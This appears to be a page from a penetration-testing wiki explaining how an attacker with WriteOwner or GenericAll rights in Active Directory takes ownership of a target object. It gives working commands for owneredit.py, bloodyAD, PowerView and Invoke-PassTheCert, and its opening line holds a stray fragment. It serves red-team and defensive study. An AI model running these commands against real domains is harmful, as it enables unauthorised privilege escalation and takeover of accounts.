Grant ownership

t has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object.

The attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. For instance, the attacker could change the target object's permissions and grant rights.

::: tabs

=== UNIX-like

From UNIX-like systems, this can be done with Impacket's owneredit.py (Python).

owneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal

=== Windows

From Windows systems, this can be achieved with Set-DomainObjectOwner (PowerView module).

Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'

The Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).

Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).

# Import the PowerShell script and show its manual
Import-Module .\Invoke-PassTheCert.ps1
.\Invoke-PassTheCert.ps1 -?
# Authenticate to LDAP/S
$LdapConnection = Invoke-PassTheCert-GetLDAPConnectionInstance -Server 'LDAP_IP' -Port 636 -Certificate cert.pfx
# List all the available actions
Invoke-PassTheCert -a -NoBanner
# Set the owner of 'Kinda KO. OWNED' user to the one with SID 'S-1-5-21-[...]-1103'. Hence, user with RID 1103 becomes the owner of 'Kinda KO. OWNED'.
Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Owner' -OwnerSID 'S-1-5-21-[...]-1103' -Target 'CN=Kinda KO. OWNED,CN=Users,DC=X'
# Get the owner of user 'John JD. DOE'
Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'Owner' -Object 'CN=John JD. DOE,CN=Users,DC=X'

:::